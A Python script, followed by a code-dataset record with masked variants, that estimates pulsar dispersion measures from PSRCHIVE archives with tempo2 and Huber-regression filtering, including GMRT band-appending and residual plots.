fig.suptitle('Source: PSR %s; MJD: %.4f; Prefit Wrms: %.2f $\mu$s; Postfit Wrms: %.2f $\mu$s\nMedian ToA Err: %.2f $\mu$s; DM: %.6f $\pm$ %.6f pc cm$^{-3}$; Reduced $\chi^2$: %.2f' % (ar.get_source(), ar_mjd, prefit_rms, postfit_rms, np.median(terrf1), dmval, dmverr, fitchisq), fontsize=11, fontweight='bold')
dirplot=os.path.join(pwd,ar_psr+"_"+ar_tel+"_plots")
if not os.path.exists(dirplot):
os.makedirs(dirplot)
plotfile=dirplot+"/"+ar_psr+"_"+str(ar_mjd)+"_"+str(ar_centfr)+"_"+ar_tel+"_DMfitResid.pdf"
plt.savefig(plotfile, format='pdf')
plt.close()
if not quiet:
print ('done!')
del ar
return(dmval, dmverr, fitchisq, prefit_rms, postfit_rms, np.median(terrf1))
''' Frequency appending the data archives '''
def freq_appendData(narch, archives, offset, b3scrunch, b5scrunch):
for i in range(narch):
archives[i].tscrunch()
# GMRT specific Jump. This is not ideal, as these jumps calculated by tempo2
# will be dependent on the pulsar period. Default values of this jump given
# is from the timing of PSR J1643-1224.
# PS: this jump is valid for only cycle 37 dataset (or the given MJD limits).
if (archives[0].get_telescope() == 'GMRT'):
for i in range(narch):
ar_mjd = archives[i].get_Integration(0).get_start_time().in_days()
ar_frq = archives[i].get_centre_frequency()
ar_bw = archives[i].get_bandwidth()
period = (archives[i].get_Integration(0).get_folding_period())
offset = 0.670520675
jump = (offset/period) - int(offset/period)
if (ar_frq >= 1260. and ar_frq < 1460.):
if (ar_mjd >=58810. and ar_mjd < 58991.):
archives[i].rotate_phase(-jump)
freq_append = psrchive.FrequencyAppend()
ttfreq = archives[0].get_centre_frequency()
if (300. < ttfreq < 500.):
archives[0].fscrunch(b3scrunch)
if (1160. < ttfreq < 1460.):
archives[0].fscrunch(b5scrunch)
freq_append.init(archives[0])
while len(archives) > 1:
ttfreq = archives[1].get_centre_frequency()
if (300. < ttfreq < 500.):
archives[1].fscrunch(b3scrunch)
if (1160. < ttfreq < 1460.):
archives[1].fscrunch(b5scrunch)
freq_append.append(archives[0],archives[1])
del archives[1]
return(archives[0])
''' Frequency Appending the Templates '''
def freq_appendModel(narch, archives, offset, b3scrunch, b5scrunch):
for i in range(narch):
archives[i].tscrunch()
# GMRT specific Jump. This is not ideal, as these jumps calculated by tempo2
# will be dependent on the pulsar period. Default values of this jump given
# is from the timing of PSR J1643-1224.
# PS: this jump is valid for only cycle 37 dataset (or the given MJD limits).
if (archives[0].get_telescope() == 'GMRT'):
for i in range(narch):
ar_mjd = archives[i].get_Integration(0).get_start_time().in_days()
ar_frq = archives[i].get_centre_frequency()
ar_bw = archives[i].get_bandwidth()
period = (archives[i].get_Integration(0).get_folding_period())
offset = 0.670520675
jump = (offset/period) - int(offset/period)
if (ar_frq >= 1260. and ar_frq < 1460.):
if (ar_mjd >=58810. and ar_mjd < 58991.):
archives[i].rotate_phase(-jump)
freq_append = psrchive.FrequencyAppend()
ttfreq = archives[0].get_centre_frequency()
if (300. < ttfreq < 500.):
archives[0].fscrunch(b3scrunch)
if (1160. < ttfreq < 1460.):
archives[0].fscrunch(b5scrunch)
freq_append.init(archives[0])
while len(archives) > 1:
ttfreq = archives[1].get_centre_frequency()
if (300. < ttfreq < 500.):
archives[1].fscrunch(b3scrunch)
if (1160. < ttfreq < 1460.):
archives[1].fscrunch(b5scrunch)
freq_append.append(archives[0],archives[1])
del archives[1]
return(archives[0])
#----------------------------------------------------------------------------------#
main()
|
normal
|
{
"blob_id": "e464b465c4bc90c250c0ea02c17b7398d975964b",
"index": 1163,
"step-1": "<mask token>\n\n\ndef main():\n args = parser.parse_args()\n quiet = False\n if args.quiet:\n quiet = True\n tempo2 = True\n ptoa = False\n if args.print_toas:\n ptoa = True\n if not quiet:\n print('Loading the archive files for DM estimation')\n archives = []\n for filename in args.files:\n archives.append(psrchive.Archive_load(filename))\n narch = len(archives)\n if narch >= 1:\n if not quiet:\n print('Appending the archives ...'),\n ar = freq_appendData(narch, archives, args.offset, args.b3fscrunch,\n args.b5fscrunch)\n if not quiet:\n print(' done!')\n elif not quiet:\n print('Only one archive was given, so nothing to frequency-append.')\n ar = archives[0]\n del archives\n ar_psr = ar.get_source()\n ar_nbins = ar.get_nbin()\n ar_tel = ar.get_telescope()\n mjd_start = ar.get_Integration(0).get_start_time().in_days()\n mjd_end = ar.get_Integration(0).get_end_time().in_days()\n ar_mjd = mjd_start + (mjd_end - mjd_start) / 2.0\n length = ar.integration_length()\n ar.update_centre_frequency()\n ar_centfr = ar.get_centre_frequency()\n ar_nchan = ar.get_nchan()\n ar_bw = ar.get_bandwidth()\n ar_chnwdth = ar_bw / ar_nchan\n ffrac = args.fscrunch\n if not quiet:\n print('\\nNow preparing for DM estimation\\n')\n pwd = os.getcwd()\n if args.ephem != None:\n ephemeris = args.ephem\n else:\n ephemeris = 'ephemerides/' + ar_psr + '.par'\n if not os.path.exists(ephemeris):\n sys.exit(1)\n if not quiet:\n print('\\nEphemeris file is:' + ephemeris + '\\n')\n model = []\n for filename in args.model:\n model.append(psrchive.Archive_load(filename))\n if args.model != None:\n if len(args.model) == 1:\n model = freq_appendModel(1, model, args.offset, args.b3fscrunch,\n args.b5fscrunch)\n if len(args.model) > 1:\n model = freq_appendModel(1, model, args.offset, args.b3fscrunch,\n args.b5fscrunch)\n if args.model == None:\n if not quiet:\n print('Looking for matching template in templates directory...'),\n import subprocess\n tempdir = 'templates/*.sm'\n tempfile = ar_psr + '_tmp.txt'\n a = subprocess.call(\n \"psredit -c name,nbin,bw,nchan,freq -Q '%s' > '%s'\" % (tempdir,\n tempfile), shell=True)\n tempnchan = ''\n t1 = str(ar_nbins)\n if ar_tel == 'gmrt':\n t2 = str(int(ar_bw))\n else:\n t2 = str(ar_bw)\n t3 = '%.2f' % ar_centfr\n f = open(tempfile, 'r')\n for line in f:\n line = line.strip()\n columns = line.split()\n t4 = float(columns[5])\n t4 = '%.2f' % t4\n if ar_tel == 'gmrt':\n if columns[1] == ar_psr and columns[2] == t1 and str(int(\n columns[3])) == t2 and t4 == t3:\n modeltempl = columns[0]\n tempnchan = columns[4]\n if not quiet:\n print(' done\\n')\n elif columns[1] == ar_psr and columns[2] == t1 and str(columns[3]\n ) == t2 and t4 == t3:\n modeltempl = columns[0]\n tempnchan = columns[4]\n if not quiet:\n print(' done\\n')\n if modeltempl == '' and tempnchan == '':\n print(\n '\\n** No matching template found for DM fitting. Exiting. **\\n'\n )\n sys.exit(1)\n f.close()\n os.remove(tempfile)\n if not quiet:\n print('Found matching template: ' + modeltempl)\n model.append(psrchive.Archive_load(modeltempl))\n if not quiet:\n print('\\nEstimating the DM from the observation')\n model.update_centre_frequency()\n arch = ar.clone()\n dmval, dmverr, fitchisq, pre_rms, post_rms, ToA_Err = DMCalc(arch,\n ar_nchan, ar_centfr, ar_bw, ar_psr, ar_tel, ar_mjd, model,\n ephemeris, pwd, ffrac, quiet, tempo2, ptoa, narch)\n if args.writeout:\n infile = open(ephemeris, 'r')\n tmpeph = ar_psr + '.eph'\n output = open(tmpeph, 'w+')\n for i, line in enumerate(infile):\n if not line.lstrip().startswith('DM'):\n if not line.lstrip().startswith('DMEPOCH'):\n output.write(line)\n infile.close()\n output.close()\n dmline = 'DM\\t\\t\\t ' + str(dmval) + '\\t\\t' + str(dmverr)\n dmepochline = 'DMEPOCH\\t\\t ' + str(round(ar_mjd, 2))\n if not args.quiet:\n print('Updating the ephemeris with new DM... '),\n f = open(tmpeph, 'a')\n f.write('%s\\n %s\\n' % (dmline, dmepochline))\n if not args.quiet:\n print(' done!')\n f.close()\n if not quiet:\n print(\n 'Correcting the DM of the observed file and writing it out... '\n ),\n os.remove(tmpeph)\n dirfinal = os.path.join(pwd, ar_psr + '_' + ar_tel + '_final')\n if not os.path.exists(dirfinal):\n os.makedirs(dirfinal)\n outfile = dirfinal + '/' + ar_psr + '_' + str(ar_mjd\n ) + '_' + ar_tel + '.ar'\n ar.set_dispersion_measure(dmval)\n ar.dedisperse()\n if not args.Tscrunch:\n ar.tscrunch(args.tscrunch)\n else:\n ar.tscrunch()\n if not args.Fscrunch:\n ar.fscrunch(ffrac)\n else:\n ar.fscrunch()\n ar.unload(outfile)\n if not args.quiet:\n print(' done!')\n del ar\n if not quiet:\n print('The file is corrected for DM and is written out to\\n' +\n outfile)\n f = open(ar_psr + '_DM_timeseries.txt', 'a')\n f.write('%s %.4f %.6f %.6f %.2f %.4f %.4f %.4f %.2f %.2f %s\\n' % (\n filename, ar_mjd, dmval, dmverr, fitchisq, pre_rms, post_rms,\n ToA_Err, ar_centfr, ar_bw, ar_tel))\n f.close()\n import time\n end = time.time()\n total = end - start\n print(\n '-----------------------------------------------------------------------------'\n )\n print('MJD\\t\\tDM\\t\\tDMerr\\t\\tChisq\\tC_Fr\\tBW\\tTel')\n print('%.6f\\t%.6f\\t%.6f\\t%.2f\\t%.1f\\t%.1f\\t%s' % (ar_mjd, dmval, dmverr,\n fitchisq, ar_centfr, ar_bw, ar_tel))\n print(\n '-----------------------------------------------------------------------------'\n )\n print('\\nThe program took %.1f seconds to finish' % total)\n\n\n<mask token>\n\n\ndef DMCalc(ar, ar_nchan, ar_centfr, ar_bw, ar_psr, ar_tel, ar_mjd, model,\n ephemeris, pwd, ffrac, quiet, tempo2, ptoa, narch):\n if model == None:\n sys.exit(1)\n init_dm = ar.get_dispersion_measure()\n if not quiet:\n print('Using the ArrivalTime (pat) with PGS in Tempo2 format')\n arrtim = psrchive.ArrivalTime()\n arrtim.set_shift_estimator('PGS')\n arrtim.set_format('Tempo2')\n arrtim.set_format_flags('IPTA')\n if not quiet:\n print('Loading the template file for processing... '),\n std = model.clone()\n std.pscrunch()\n std.tscrunch()\n std_nchan = std.get_nchan()\n std.dedisperse()\n std.fscrunch(ffrac)\n arrtim.set_standard(std)\n if not quiet:\n print(' done!')\n ar.fscrunch(ffrac)\n ar.pscrunch()\n ar.tscrunch()\n arrtim.set_observation(ar)\n if not quiet:\n print('Finding the ToAs... '),\n toas = arrtim.get_toas()\n toas_filtered = [x.split()[:5] for x in toas]\n str_filename, str_freq, str_mjd, str_toaErr, str_site = zip(*toas_filtered)\n freq = np.asarray(str_freq, dtype=np.float64)\n amjd = np.asarray(str_mjd, dtype=np.float64)\n terr = np.asarray(str_toaErr, dtype=np.float64)\n if not quiet:\n print(' done!')\n print('Removing the bad ToAs using Huber Regression... '),\n condition1 = terr < 3 * np.median(terr)\n freqnew = np.extract(condition1, freq)\n amjdnew = np.extract(condition1, amjd)\n terrnew = np.extract(condition1, terr)\n tempfile = ar_psr + '_tmp.txt'\n f = open(tempfile, 'w+')\n head = 'FORMAT 1\\n'\n f.write('%s' % head)\n for i in range(0, np.size(freqnew)):\n f.write('%s %.12f %.20f %.8f %s\\n' % (str_filename[0], freqnew[i],\n amjdnew[i], terrnew[i], str_site[0]))\n f.close()\n tmpstr = 'tempo2 -output general2 -f'\n tmp = os.popen(tmpstr + \n ' %s %s -s \"1111111 {freq} {pre} {err}\\n\" | grep \\'1111111\\'' % (\n ephemeris, tempfile)).read()\n os.remove(tempfile)\n tmp1 = tmp.split('\\n')\n freqtmp = np.zeros(np.size(amjdnew))\n toastmp = np.zeros(np.size(amjdnew))\n TErrtmp = np.zeros(np.size(amjdnew))\n for i in range(np.size(amjdnew)):\n _, freqtmp[i], toastmp[i], TErrtmp[i] = tmp1[i].split()\n TErrtmp /= 1000000.0\n from sklearn import linear_model\n from sklearn.linear_model import HuberRegressor\n from sklearn.preprocessing import PolynomialFeatures\n from sklearn.pipeline import make_pipeline\n freqarr = freqtmp.reshape(-1, 1)\n toastmp *= 1000000.0\n toashift = np.min(toastmp) * -1.5\n toastmp += toashift\n Terrtmp = TErrtmp * 1000000.0\n model = make_pipeline(PolynomialFeatures(2), HuberRegressor())\n model.fit(freqarr, toastmp, huberregressor__sample_weight=np.ravel(1.0 /\n Terrtmp))\n y_pred = model.predict(freqarr)\n residuals = toastmp - y_pred\n median = np.median(residuals)\n MAD = np.median(np.abs(residuals - np.median(residuals))\n ) / 0.6744897501960817\n condition2 = (residuals > median - 3 * MAD) & (residuals < median + 3 * MAD\n )\n freqf = np.around(np.extract(condition2, freqarr), 3)\n amjdf = np.extract(condition2, amjdnew)\n toasf = np.extract(condition2, toastmp)\n terrf = np.extract(condition2, TErrtmp)\n prefit_rms = np.sqrt(np.cov(toasf, aweights=terrf))\n terrf *= 1000000.0\n if not quiet:\n print(' done!')\n if ptoa:\n if not quiet:\n print('Writing out ToAs into a file in tempo2 format'),\n dirtoas = os.path.join(pwd, ar_psr + '_' + ar_tel + '_ToAs')\n if not os.path.exists(dirtoas):\n os.makedirs(dirtoas)\n outfile = dirtoas + '/' + ar_psr + '_' + str(ar_mjd\n ) + '_' + ar_tel + '_ToAs.txt'\n f = open(outfile, 'w+')\n head = 'FORMAT 1'\n f.write('%s\\n' % head)\n for i in range(0, np.size(freqf)):\n f.write('%s %.8f %.18f %.6f %s\\n' % (str_filename[0], freqf[i],\n amjdf[i], terrf[i], str_site[0]))\n f.close()\n if not quiet:\n print('done!')\n if not quiet:\n print('\\nWriting the ToAs to a temporary file for tempo2 fitting...'),\n outfiletmp = ar_psr + 'tmp_ToAs.txt'\n f = open(outfiletmp, 'w+')\n head = 'FORMAT 1'\n f.write('%s\\n' % head)\n for i in range(0, np.size(freqf)):\n f.write('%s %.8f %.18f %.6f %s\\n' % (str_filename[0], freqf[i],\n amjdf[i], terrf[i], str_site[0]))\n f.close()\n if not quiet:\n print(' done!\\n')\n dmstr = os.popen(\n \"tempo2 -f %s %s -nofit -fit dm | grep 'DM (cm^-3 pc)'| awk '{print $5,$6}'\"\n % (ephemeris, outfiletmp)).read()\n dm, dmerr = dmstr.split()\n dmval = float(dm)\n dmverr = float(dmerr)\n chisqstr = os.popen(\n \"tempo2 -f %s %s -nofit -fit dm | grep 'Fit Chisq'| awk '{print $9}'\" %\n (ephemeris, outfiletmp)).read()\n fitchisq = float(chisqstr)\n os.remove(outfiletmp)\n infile = open(ephemeris, 'r')\n tmpeph1 = ar_psr + '_tmpeph.eph'\n output = open(tmpeph1, 'w+')\n for i, line in enumerate(infile):\n if not line.lstrip().startswith('DM'):\n if not line.lstrip().startswith('DMEPOCH'):\n output.write(line)\n infile.close()\n output.close()\n dmline = 'DM ' + str(dmval) + '\\t1\\t' + str(dmverr)\n dmepochline = 'DMEPOCH\\t ' + str(round(ar_mjd, 2))\n f = open(tmpeph1, 'a')\n f.write('%s\\n%s\\n' % (dmline, dmepochline))\n f.close()\n newarch = ar.clone()\n newarch.tscrunch()\n newarch.set_dispersion_measure(dmval)\n arrtim.set_observation(newarch)\n arrtim.set_standard(std)\n toas1 = arrtim.get_toas()\n toas1_filtered = [x.split()[:5] for x in toas1]\n str_filename1, str_freq1, str_mjd1, str_toaErr1, str_site1 = zip(*\n toas1_filtered)\n freq1 = np.asarray(str_freq1, dtype=np.float64)\n amjd1 = np.asarray(str_mjd1, dtype=np.float64)\n terr1 = np.asarray(str_toaErr1, dtype=np.float64)\n freqnew1 = np.extract(condition1, freq1)\n amjdnew1 = np.extract(condition1, amjd1)\n terrnew1 = np.extract(condition1, terr1)\n tempfile1 = ar_psr + '_tmp1.txt'\n f = open(tempfile1, 'w+')\n head = 'FORMAT 1\\n'\n f.write('%s' % head)\n for i in range(0, np.size(freqnew1)):\n f.write('%s %.12f %.20f %.8f %s\\n' % (str_filename1[0], freqnew1[i],\n amjdnew1[i], terrnew1[i], str_site1[0]))\n f.close()\n tmp2 = os.popen(\n \"\"\"tempo2 -output general2 -f %s %s -s \"1111111 {freq} {pre} {err}\n\" | grep '1111111'\"\"\"\n % (tmpeph1, tempfile1)).read()\n os.remove(tempfile1)\n os.remove(tmpeph1)\n tmp3 = tmp2.split('\\n')\n freqtmp2 = np.zeros(np.size(amjdnew1))\n toastmp2 = np.zeros(np.size(amjdnew1))\n TErrtmp2 = np.zeros(np.size(amjdnew1))\n for i in range(np.size(amjdnew1)):\n _, freqtmp2[i], toastmp2[i], TErrtmp2[i] = tmp3[i].split()\n freqf1 = np.around(np.extract(condition2, freqtmp2), 3)\n amjdf1 = np.extract(condition2, amjdnew1)\n toasf1 = np.extract(condition2, toastmp2)\n terrf1 = np.extract(condition2, TErrtmp2)\n toasf1 *= 1000000.0\n postfit_rms = np.sqrt(np.cov(toasf1, aweights=terrf1))\n ar_nbin = newarch.get_nbin()\n ar_nchn = newarch.get_nchan()\n if narch == 1:\n freq_bot = ar.get_centre_frequency() - ar_bw / 2.0\n freq_top = ar.get_centre_frequency() + ar_bw / 2.0\n if narch > 1:\n if ar_bw == 200.0:\n freq_bot = 400.0\n freq_top = 1460.0\n if ar_bw == 400.0:\n freq_bot = 300.0\n freq_top = 1460.0\n newarch.dedisperse()\n newarch.remove_baseline()\n profdata2D = newarch.get_data()[:, 0, :, :].flatten().reshape(ar_nchn,\n ar_nbin)\n prof = newarch.clone()\n prof.fscrunch()\n profdata1D = prof.get_data().flatten()\n profdata1D /= np.max(profdata1D)\n residDM = init_dm - dmval\n dmcurve = 4.15 * 1000.0 * residDM * (1.0 / (np.min(freqf) / 1000.0) ** \n 2 - 1.0 / (freqf / 1000.0) ** 2)\n dmoff = np.median(toasf) - np.median(dmcurve)\n dmcurve += dmoff\n fig = plt.figure(3, figsize=(8, 6))\n fig.subplots_adjust(hspace=0.05)\n ax0 = plt.subplot2grid((3, 8), (0, 0), rowspan=2, colspan=3)\n ax1 = plt.subplot2grid((3, 8), (2, 0), rowspan=1, colspan=3)\n ax2 = plt.subplot2grid((3, 8), (0, 4), colspan=4)\n ax3 = plt.subplot2grid((3, 8), (1, 4), colspan=4)\n ax4 = plt.subplot2grid((3, 8), (2, 4), colspan=4)\n ax0.imshow(np.sqrt(profdata2D ** 2) ** 0.5, origin='lower', extent=(0, \n ar_nbin - 1, freq_bot, freq_top), aspect='auto', cmap='hot')\n ax0.set_ylabel('Frequency (MHz)', fontweight='bold', fontsize=12)\n ax0.tick_params(axis='x', which='both', bottom=True, top=True,\n labelbottom=False)\n ax1.plot(np.arange(ar_nbin, dtype=float), profdata1D, color='black',\n linewidth=0.5)\n ax1.set_xlim(0, ar_nbin - 1)\n ax1.set_xlabel('Pulse Phase (bins)', fontweight='bold', fontsize=12)\n ax1.set_ylabel('Intensity', fontweight='bold', fontsize=12)\n ax2.errorbar(freqtmp, toastmp, yerr=Terrtmp, fmt='.', color='gray',\n label='Prefit: Unfiltered', capsize=2)\n ax2.plot(freqtmp, y_pred, '--r', label='Polynomial Fit')\n ax2.set_xlim(freq_bot, freq_top)\n ax2.grid()\n ax2.legend(loc='upper right')\n ax2.axes.xaxis.set_ticklabels([])\n ax3.yaxis.set_label_position('right')\n ax3.errorbar(freqf, toasf - np.median(toasf), terrf, fmt='.k', label=\n 'Prefit: Filtered', capsize=2)\n ax3.set_xlim(freq_bot, freq_top)\n ax3.grid()\n ax3.legend(loc='upper right')\n ax3.axes.xaxis.set_ticklabels([])\n ax3.set_ylabel('ToA Residuals ($\\\\mu$s)', fontweight='bold', fontsize=12)\n ax4.errorbar(freqf1, toasf1 - np.median(toasf1), terrf1, fmt='.r',\n label='Postfit', capsize=2)\n ax4.set_xlim(freq_bot, freq_top)\n ax4.grid()\n ax4.legend(loc='upper right')\n ax4.set_xlabel('Frequency (MHz)', fontweight='bold', fontsize=12)\n fig.suptitle(\n \"\"\"Source: PSR %s; MJD: %.4f; Prefit Wrms: %.2f $\\\\mu$s; Postfit Wrms: %.2f $\\\\mu$s\nMedian ToA Err: %.2f $\\\\mu$s; DM: %.6f $\\\\pm$ %.6f pc cm$^{-3}$; Reduced $\\\\chi^2$: %.2f\"\"\"\n % (ar.get_source(), ar_mjd, prefit_rms, postfit_rms, np.median(\n terrf1), dmval, dmverr, fitchisq), fontsize=11, fontweight='bold')\n dirplot = os.path.join(pwd, ar_psr + '_' + ar_tel + '_plots')\n if not os.path.exists(dirplot):\n os.makedirs(dirplot)\n plotfile = dirplot + '/' + ar_psr + '_' + str(ar_mjd) + '_' + str(ar_centfr\n ) + '_' + ar_tel + '_DMfitResid.pdf'\n plt.savefig(plotfile, format='pdf')\n plt.close()\n if not quiet:\n print('done!')\n del ar\n return dmval, dmverr, fitchisq, prefit_rms, postfit_rms, np.median(terrf1)\n\n\n<mask token>\n\n\ndef freq_appendData(narch, archives, offset, b3scrunch, b5scrunch):\n for i in range(narch):\n archives[i].tscrunch()\n if archives[0].get_telescope() == 'GMRT':\n for i in range(narch):\n ar_mjd = archives[i].get_Integration(0).get_start_time().in_days()\n ar_frq = archives[i].get_centre_frequency()\n ar_bw = archives[i].get_bandwidth()\n period = archives[i].get_Integration(0).get_folding_period()\n offset = 0.670520675\n jump = offset / period - int(offset / period)\n if ar_frq >= 1260.0 and ar_frq < 1460.0:\n if ar_mjd >= 58810.0 and ar_mjd < 58991.0:\n archives[i].rotate_phase(-jump)\n freq_append = psrchive.FrequencyAppend()\n ttfreq = archives[0].get_centre_frequency()\n if 300.0 < ttfreq < 500.0:\n archives[0].fscrunch(b3scrunch)\n if 1160.0 < ttfreq < 1460.0:\n archives[0].fscrunch(b5scrunch)\n freq_append.init(archives[0])\n while len(archives) > 1:\n ttfreq = archives[1].get_centre_frequency()\n if 300.0 < ttfreq < 500.0:\n archives[1].fscrunch(b3scrunch)\n if 1160.0 < ttfreq < 1460.0:\n archives[1].fscrunch(b5scrunch)\n freq_append.append(archives[0], archives[1])\n del archives[1]\n return archives[0]\n\n\n<mask token>\n\n\ndef freq_appendModel(narch, archives, offset, b3scrunch, b5scrunch):\n for i in range(narch):\n archives[i].tscrunch()\n if archives[0].get_telescope() == 'GMRT':\n for i in range(narch):\n ar_mjd = archives[i].get_Integration(0).get_start_time().in_days()\n ar_frq = archives[i].get_centre_frequency()\n ar_bw = archives[i].get_bandwidth()\n period = archives[i].get_Integration(0).get_folding_period()\n offset = 0.670520675\n jump = offset / period - int(offset / period)\n if ar_frq >= 1260.0 and ar_frq < 1460.0:\n if ar_mjd >= 58810.0 and ar_mjd < 58991.0:\n archives[i].rotate_phase(-jump)\n freq_append = psrchive.FrequencyAppend()\n ttfreq = archives[0].get_centre_frequency()\n if 300.0 < ttfreq < 500.0:\n archives[0].fscrunch(b3scrunch)\n if 1160.0 < ttfreq < 1460.0:\n archives[0].fscrunch(b5scrunch)\n freq_append.init(archives[0])\n while len(archives) > 1:\n ttfreq = archives[1].get_centre_frequency()\n if 300.0 < ttfreq < 500.0:\n archives[1].fscrunch(b3scrunch)\n if 1160.0 < ttfreq < 1460.0:\n archives[1].fscrunch(b5scrunch)\n freq_append.append(archives[0], archives[1])\n del archives[1]\n return archives[0]\n\n\n<mask token>\n",
"step-2": "<mask token>\nmatplotlib.use('Agg')\n<mask token>\nparser.add_argument('files', nargs='+', type=str, help=\n 'The list of fits file(s) for processing')\nparser.add_argument('-E', '--ephem', type=str, help=\n 'Ephemeris file to update the model. Exits if not ' +\n 'given or is not available in \"PWD/ephemerides\" ' + 'directory')\nparser.add_argument('-M', '--model', nargs='+', type=str, help=\n 'Model template for ToA generation. Exits if not ' +\n 'given or is not available in \"PWD/templates\" ' + 'directory')\nparser.add_argument('-f', '--fscrunch', type=int, default=1, help=\n 'Factor to scrunch the number of channels for ' +\n 'doing DM estimation (Def: 1)')\nparser.add_argument('-b3f', '--b3fscrunch', type=int, default=1, help=\n 'Factor to scrunch the number of channels for ' +\n 'band3 GMRT data (Def: 1)')\nparser.add_argument('-b5f', '--b5fscrunch', type=int, default=1, help=\n 'Factor to scrunch the number of channels for ' +\n 'band5 GMRT data (Def: 1)')\nparser.add_argument('-w', '--writeout', action='store_true', help=\n 'Writes out the DM corrected file. Def: False')\nparser.add_argument('-ptoa', '--print_toas', action='store_true', help=\n 'Print the prefit ToAs to file in tempo2 format. ' + 'Def: False')\nparser.add_argument('-F', '--Fscrunch', action='store_true', help=\n 'Fully scrunch the number of channels for the ' +\n 'final output archive (Def: False)')\nparser.add_argument('-T', '--Tscrunch', action='store_true', help=\n 'Completely time scrunch all the integrations')\nparser.add_argument('-t', '--tscrunch', type=int, default=1, help=\n 'Factor to scrunch the number of integrations for ' +\n 'the final output archive (Def: None)')\nparser.add_argument('-o', '--offset', type=float, default=0.670520675, help\n ='Offset to shift band 5 ToAs (in secs)')\nparser.add_argument('-q', '--quiet', action='store_true', help=\n 'Only print warnings')\n\n\ndef main():\n args = parser.parse_args()\n quiet = False\n if args.quiet:\n quiet = True\n tempo2 = True\n ptoa = False\n if args.print_toas:\n ptoa = True\n if not quiet:\n print('Loading the archive files for DM estimation')\n archives = []\n for filename in args.files:\n archives.append(psrchive.Archive_load(filename))\n narch = len(archives)\n if narch >= 1:\n if not quiet:\n print('Appending the archives ...'),\n ar = freq_appendData(narch, archives, args.offset, args.b3fscrunch,\n args.b5fscrunch)\n if not quiet:\n print(' done!')\n elif not quiet:\n print('Only one archive was given, so nothing to frequency-append.')\n ar = archives[0]\n del archives\n ar_psr = ar.get_source()\n ar_nbins = ar.get_nbin()\n ar_tel = ar.get_telescope()\n mjd_start = ar.get_Integration(0).get_start_time().in_days()\n mjd_end = ar.get_Integration(0).get_end_time().in_days()\n ar_mjd = mjd_start + (mjd_end - mjd_start) / 2.0\n length = ar.integration_length()\n ar.update_centre_frequency()\n ar_centfr = ar.get_centre_frequency()\n ar_nchan = ar.get_nchan()\n ar_bw = ar.get_bandwidth()\n ar_chnwdth = ar_bw / ar_nchan\n ffrac = args.fscrunch\n if not quiet:\n print('\\nNow preparing for DM estimation\\n')\n pwd = os.getcwd()\n if args.ephem != None:\n ephemeris = args.ephem\n else:\n ephemeris = 'ephemerides/' + ar_psr + '.par'\n if not os.path.exists(ephemeris):\n sys.exit(1)\n if not quiet:\n print('\\nEphemeris file is:' + ephemeris + '\\n')\n model = []\n for filename in args.model:\n model.append(psrchive.Archive_load(filename))\n if args.model != None:\n if len(args.model) == 1:\n model = freq_appendModel(1, model, args.offset, args.b3fscrunch,\n args.b5fscrunch)\n if len(args.model) > 1:\n model = freq_appendModel(1, model, args.offset, args.b3fscrunch,\n args.b5fscrunch)\n if args.model == None:\n if not quiet:\n print('Looking for matching template in templates directory...'),\n import subprocess\n tempdir = 'templates/*.sm'\n tempfile = ar_psr + '_tmp.txt'\n a = subprocess.call(\n \"psredit -c name,nbin,bw,nchan,freq -Q '%s' > '%s'\" % (tempdir,\n tempfile), shell=True)\n tempnchan = ''\n t1 = str(ar_nbins)\n if ar_tel == 'gmrt':\n t2 = str(int(ar_bw))\n else:\n t2 = str(ar_bw)\n t3 = '%.2f' % ar_centfr\n f = open(tempfile, 'r')\n for line in f:\n line = line.strip()\n columns = line.split()\n t4 = float(columns[5])\n t4 = '%.2f' % t4\n if ar_tel == 'gmrt':\n if columns[1] == ar_psr and columns[2] == t1 and str(int(\n columns[3])) == t2 and t4 == t3:\n modeltempl = columns[0]\n tempnchan = columns[4]\n if not quiet:\n print(' done\\n')\n elif columns[1] == ar_psr and columns[2] == t1 and str(columns[3]\n ) == t2 and t4 == t3:\n modeltempl = columns[0]\n tempnchan = columns[4]\n if not quiet:\n print(' done\\n')\n if modeltempl == '' and tempnchan == '':\n print(\n '\\n** No matching template found for DM fitting. Exiting. **\\n'\n )\n sys.exit(1)\n f.close()\n os.remove(tempfile)\n if not quiet:\n print('Found matching template: ' + modeltempl)\n model.append(psrchive.Archive_load(modeltempl))\n if not quiet:\n print('\\nEstimating the DM from the observation')\n model.update_centre_frequency()\n arch = ar.clone()\n dmval, dmverr, fitchisq, pre_rms, post_rms, ToA_Err = DMCalc(arch,\n ar_nchan, ar_centfr, ar_bw, ar_psr, ar_tel, ar_mjd, model,\n ephemeris, pwd, ffrac, quiet, tempo2, ptoa, narch)\n if args.writeout:\n infile = open(ephemeris, 'r')\n tmpeph = ar_psr + '.eph'\n output = open(tmpeph, 'w+')\n for i, line in enumerate(infile):\n if not line.lstrip().startswith('DM'):\n if not line.lstrip().startswith('DMEPOCH'):\n output.write(line)\n infile.close()\n output.close()\n dmline = 'DM\\t\\t\\t ' + str(dmval) + '\\t\\t' + str(dmverr)\n dmepochline = 'DMEPOCH\\t\\t ' + str(round(ar_mjd, 2))\n if not args.quiet:\n print('Updating the ephemeris with new DM... '),\n f = open(tmpeph, 'a')\n f.write('%s\\n %s\\n' % (dmline, dmepochline))\n if not args.quiet:\n print(' done!')\n f.close()\n if not quiet:\n print(\n 'Correcting the DM of the observed file and writing it out... '\n ),\n os.remove(tmpeph)\n dirfinal = os.path.join(pwd, ar_psr + '_' + ar_tel + '_final')\n if not os.path.exists(dirfinal):\n os.makedirs(dirfinal)\n outfile = dirfinal + '/' + ar_psr + '_' + str(ar_mjd\n ) + '_' + ar_tel + '.ar'\n ar.set_dispersion_measure(dmval)\n ar.dedisperse()\n if not args.Tscrunch:\n ar.tscrunch(args.tscrunch)\n else:\n ar.tscrunch()\n if not args.Fscrunch:\n ar.fscrunch(ffrac)\n else:\n ar.fscrunch()\n ar.unload(outfile)\n if not args.quiet:\n print(' done!')\n del ar\n if not quiet:\n print('The file is corrected for DM and is written out to\\n' +\n outfile)\n f = open(ar_psr + '_DM_timeseries.txt', 'a')\n f.write('%s %.4f %.6f %.6f %.2f %.4f %.4f %.4f %.2f %.2f %s\\n' % (\n filename, ar_mjd, dmval, dmverr, fitchisq, pre_rms, post_rms,\n ToA_Err, ar_centfr, ar_bw, ar_tel))\n f.close()\n import time\n end = time.time()\n total = end - start\n print(\n '-----------------------------------------------------------------------------'\n )\n print('MJD\\t\\tDM\\t\\tDMerr\\t\\tChisq\\tC_Fr\\tBW\\tTel')\n 